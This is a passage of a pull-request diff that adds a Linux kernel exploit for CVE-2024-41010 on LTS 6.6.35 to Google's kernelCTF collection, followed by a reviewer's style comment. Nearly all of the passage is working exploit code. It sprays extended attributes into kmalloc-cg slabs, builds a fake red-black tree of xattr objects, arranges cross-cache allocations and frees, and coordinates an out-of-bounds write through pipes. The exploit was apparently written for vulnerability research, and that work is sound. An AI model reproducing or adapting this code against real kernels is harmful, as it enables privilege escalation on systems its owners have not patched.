pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+	snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR);
+	remove_xattr(file_name, attribute_name, false);
+
+	struct simple_xattr *new_xattr = fake_xattr(RB_RED, conn1, conn2, 0x0, attr_name + 0x28, 0x10, NULL, 0x0);
+
+	memset(value_name, 0, VALUE_NAME_LEN);
+	memcpy(value_name + 0x40 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---180 -> 0x---100 (from 0xc0)
+	memcpy(value_name + 0x80 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---240 -> 0x---200 (from 0x180)
+
+	for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+	}
+
+	snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx);
+	snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 1, XATTR_PADDING_STR);
+	create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+
+	for(int i=prefix_spray_cnt + SECOND_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+	}
+
+	free(new_xattr);
+}
+
+void spray_simple_xattr_for_fake_rbtree_second(uint64_t target)
+{
+	char file_name[ATTRIBUTE_NAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_32K*2];
+	
+	for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		char *attribute_name = gen_xattr_name(XATTR_PREFIX_SECURITY, "attr1");
+		for(int i=0; i<XATTR_VALUE_KMALLOC_CG_32K/8; i++)
+			((uint64_t *)(value_name))[i] = target - 0x20;
+
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_32K, true);
+	}
+}
+
+void generate_fake_rbtree(int pip1[], int pip2[], uint64_t fname_idx, uint64_t target, uint64_t attr_name_ptr, uint64_t conn1, uint64_t conn2)
+{
+	char step[10];
+
+	unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET);
+	
+	set_simple_xattr_for_fake_rbtree_first(fname_idx, attr_name_ptr, conn1, conn2);
+
+	/* ------------- <exploit alloc, cross cache alloc & exploit free, cross cache free> --------------- */
+	write(pip1[1], "step 1", 4);
+	read(pip2[0], step, 10);
+
+	spray_simple_xattr_for_fake_rbtree_second(target);
+	printf("[+] spray xattr, which would be overwriten\n");
+
+	/* -------------------- <exploit write> ------------------------- */
+	write(pip1[1], "step 3", 4);
+
+	/* ---------------------- heap oob read ---------------------------------- */
+	printf("[*] waiting for exit...\n");
```

Comment:
Comment here what are you waiting for exactly (which kernel function to be run). More details about this is in the [style guide](https://google.github.io/security-research/kernelctf/style_guide#sleeping--waiting).